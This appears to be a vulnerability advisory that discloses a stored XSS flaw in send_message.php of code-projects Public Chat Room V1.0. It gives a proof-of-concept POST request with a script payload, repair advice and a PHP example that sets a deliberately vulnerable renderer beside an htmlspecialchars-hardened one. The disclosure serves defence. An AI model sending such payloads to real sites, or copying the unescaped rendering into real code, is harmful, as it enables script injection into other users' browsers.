code-projects Public Chat Room V1.0/send_message.php Stored XSS Attack
NAME OF AFFECTED PRODUCT(S): code-projects Public Chat Room V1.0
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S): Affected: V1.0
submitter
Vulnerable File: send_message.php
VERSION(S): V1.0
Software Link
PROBLEM TYPE
Vulnerability Type: Stored Cross-Site Scripting (XSS)
Root Cause
- The server fails to escape user input before rendering it to the browser; output-encoding functions such as htmlspecialchars() are not used. As a result, HTML/JavaScript submitted by users is interpreted and executed by the browser.
Impact
- An attacker can execute arbitrary scripts, leading to:
DESCRIPTION
- This vulnerability appears in the chat message rendering logic, where user-submitted content such as chat_msg and your_name is retrieved from the database and echoed directly into the HTML page without HTML encoding. An attacker can inject malicious HTML or JavaScript, which executes in other users' browsers when they view the page, resulting in a stored Cross-Site Scripting (XSS) attack.
Vulnerability details and POC
Vulnerability Name: Stored XSS in send_message.php
POC Example:
---
POST /chat/send_message.php HTTP/1.1
Host: localhost
Content-Length: 48
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Not?A_Brand";v="99", "Chromium";v="130"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/chat/home.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=l5ngo5kq1gihp96qvkbbms3vi6
Connection: keep-alive

msg=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&id=1
---
The following is the exploitation process and the screenshot of the result; the payload stored in the message and rendered unescaped is:
<script>alert('XSS')</script>
Suggested repair
- Escape all user-generated output using HTML entities: apply htmlspecialchars($msg, ENT_QUOTES, 'UTF-8') to every value echoed into the page (chat_msg and your_name included) to prevent HTML/JS execution.
- Input sanitization: apply input filters or allowlists to prevent users from submitting HTML/JS code.
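The repair in code, as an added example that is not the project's own code: the message rendering step in the vulnerable form described above beside the hardened form, run on a constructed database row. The function names (render_message_vulnerable, render_message_safe, e, contains_raw_tag) are hypothetical; ENT_SUBSTITUTE is added beyond the report's suggestion.

```php
<?php
// Constructed sample row, shaped like a record read back from the chat
// table after the PoC request above was accepted and stored.
$row = [
    'your_name' => 'guest',
    'chat_msg'  => "<script>alert('XSS')</script>",
];

// Vulnerable rendering: stored values are concatenated into markup as they
// are, so the browser parses the <script> element and runs it for every
// user who loads the page.
function render_message_vulnerable(array $row): string
{
    return '<li><b>' . $row['your_name'] . '</b>: ' . $row['chat_msg'] . '</li>';
}

// Hardened rendering: every dynamic value is HTML-encoded at the point of
// output. ENT_QUOTES also encodes ' and " so the value stays safe inside
// attribute values; ENT_SUBSTITUTE replaces invalid UTF-8 instead of
// returning an empty string; the explicit charset avoids mis-decoding.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_message_safe(array $row): string
{
    return '<li><b>' . e($row['your_name']) . '</b>: ' . e($row['chat_msg']) . '</li>';
}

// Regression check for the fix: no stored value containing "<" may appear
// verbatim in the rendered markup (it must have become "&lt;...").
function contains_raw_tag(string $html, array $row): bool
{
    foreach ($row as $value) {
        if (strpos($value, '<') !== false && strpos($html, $value) !== false) {
            return true;
        }
    }
    return false;
}

echo render_message_vulnerable($row), PHP_EOL;
echo render_message_safe($row), PHP_EOL;
var_dump(contains_raw_tag(render_message_vulnerable($row), $row));
var_dump(contains_raw_tag(render_message_safe($row), $row));
```

The check reports the vulnerable rendering as containing the raw tag and the hardened rendering as clean; the same check can be dropped into the project's tests once the encoding is applied.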